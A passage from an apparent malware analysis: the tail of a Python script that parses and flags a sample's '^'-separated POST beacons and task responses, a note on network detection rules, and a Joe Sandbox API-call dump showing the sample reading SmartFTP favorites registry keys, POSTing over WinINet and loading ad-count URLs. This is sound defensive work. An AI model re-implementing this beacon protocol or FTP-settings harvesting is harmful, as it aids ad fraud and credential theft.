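    parts = [command] + [f"{k}={v}" for k, v in fields.items()]
    if rcn:
        parts.append("rcn=1")
    return SEP.join(parts)


def parse_beacon(body):
    """Inverse of build_beacon: (command, {key: value}). A value containing
    '=' survives because only the first '=' of each part is the terminator."""
    command, *rest = body.split(SEP)
    fields = {}
    for part in rest:
        key, _, value = part.partition("=")
        fields[key] = value
    return command, fields


def is_beacon(body):
    """Detection predicate: a known command followed by at least the rev and
    os fields, which every format string on the page carries."""
    if not body or SEP not in body:
        return False
    command, fields = parse_beacon(body)
    return command in KNOWN_COMMANDS and {"rev", "os"} <= fields.keys()


def parse_tasks(text):
    """Extract tasks from the tag-delimited response format.
    Assumption: each <url> opens a new task and the <domain>/<title> that
    follow belong to it; a URL without a scheme gets the "http://" literal."""
    tasks = []
    tag_re = r"<(%s)>(.*?)</\1>" % "|".join(TASK_TAGS)
    for tag, value in re.findall(tag_re, text, re.S):
        if tag == "url" or not tasks:
            tasks.append({})
        tasks[-1][tag] = value.strip()
    for task in tasks:
        url = task.get("url", "")
        if url and not re.match(r"^[a-z][a-z0-9+.-]*://", url, re.I):
            task["url"] = "http://" + url
    return tasks


def flag_requests(requests):
    """Indexes of captured requests (dicts: method, user_agent, body) whose
    body has the beacon shape. The sample opens WinINet with a NULL agent
    string, so a missing User-Agent on a POST corroborates a hit but is not
    the trigger: plenty of legitimate tooling sends none either."""
    hits = []
    for i, req in enumerate(requests):
        if req.get("method") == "POST" and is_beacon(req.get("body", "")):
            hits.append(i)
    return hits


# Constructed sample traffic (assumption, not from the report's capture).
SAMPLE_REQUESTS = [
    {"method": "POST", "user_agent": None,
     "body": "job^rev=1^os=6.1^rcn=1"},
    {"method": "POST", "user_agent": "Mozilla/5.0",
     "body": "username=alice&password=hunter2"},
    {"method": "POST", "user_agent": None,
     "body": "jstat^rev=1^code=0^site=example.test^searches=3^clicks=1^adver=0^os=6.1"},
    {"method": "GET", "user_agent": None, "body": ""},
]

# Constructed task response (assumption): two tasks, one URL without a scheme.
SAMPLE_TASKS = (
    "<url>example.test/a.html</url><domain>example.test</domain><title>a</title>"
    "<url>http://example.test/b.html</url><domain>example.test</domain><title>b</title>"
)

if __name__ == "__main__":
    print(flag_requests(SAMPLE_REQUESTS))
    print(parse_tasks(SAMPLE_TASKS))
```

For a network-side rule the body shape is the specific signal: a bare command token followed by '^'-separated key=value pairs that include rev and os. Matching only on the absent User-Agent header would page on every WinINet-based updater that also passes NULL to InternetOpenW.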
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 00409046
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 8978318f5479d9c6a2128e97229e25f0ab853f53a681c81c746c7dd648e69de9
                  • Instruction ID: 72e70a91572158687df8678bea7e51b1bbf589372677d733e04197d71cfd8d58
                  • Opcode Fuzzy Hash: 8978318f5479d9c6a2128e97229e25f0ab853f53a681c81c746c7dd648e69de9
                  • Instruction Fuzzy Hash: 0B41AE70600216EFDB10DF94C9885AD7BB2FB48309F2048BED581B7251C77A6E92DF08
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  • Opcode ID: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                  • Opcode Fuzzy Hash: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  • API String ID: 961146071-1814004025
                  • Opcode ID: b231c6d6edeafd2a36d4afe3665cd665c01720833af24f413fd8087ba7bf51f5
                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                  • Opcode Fuzzy Hash: b231c6d6edeafd2a36d4afe3665cd665c01720833af24f413fd8087ba7bf51f5
                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                  APIs
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004051EB
                  Strings
                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  • folder, xrefs: 00405184
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  • personal favorites, xrefs: 00405176
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: EnvironmentExpandStrings
                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  • API String ID: 237503144-821743658
                  • Opcode ID: d403c6e0ff69697be521eaf543c14185a1ab81bd096a87ce139bc0f4ede75b67
                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                  • Opcode Fuzzy Hash: d403c6e0ff69697be521eaf543c14185a1ab81bd096a87ce139bc0f4ede75b67
                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  • API String ID: 950422046-1300462704
                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                  APIs
                  • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID: c{@
                  • API String ID: 3735792614-264719814
                  • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                  • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  • API String ID: 3118597399-3449771660
                  • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                  • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID:
                  • API String ID: 3143865713-0
                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                  • Opcode Fuzzy Hash: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                  APIs
                  • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  • API String ID: 594998759-2399716736
                  • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                  • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                  • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "URL"$"encrypted"
                  • API String ID: 2525500382-4151690107
                  • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                  • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"$"url"
                  • API String ID: 2525500382-2438671658
                  • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                  • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?), ref: 004095A4
                  • CharLowerW.USER32(?,?,?,?,?,?,?), ref: 004095D8
                  • SysFreeString.OLEAUT32(?), ref: 00409608
                  • SysFreeString.OLEAUT32(?), ref: 0040960D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000), ref: 00406C91
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer
                  • API String ID: 71445658-938904094
                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC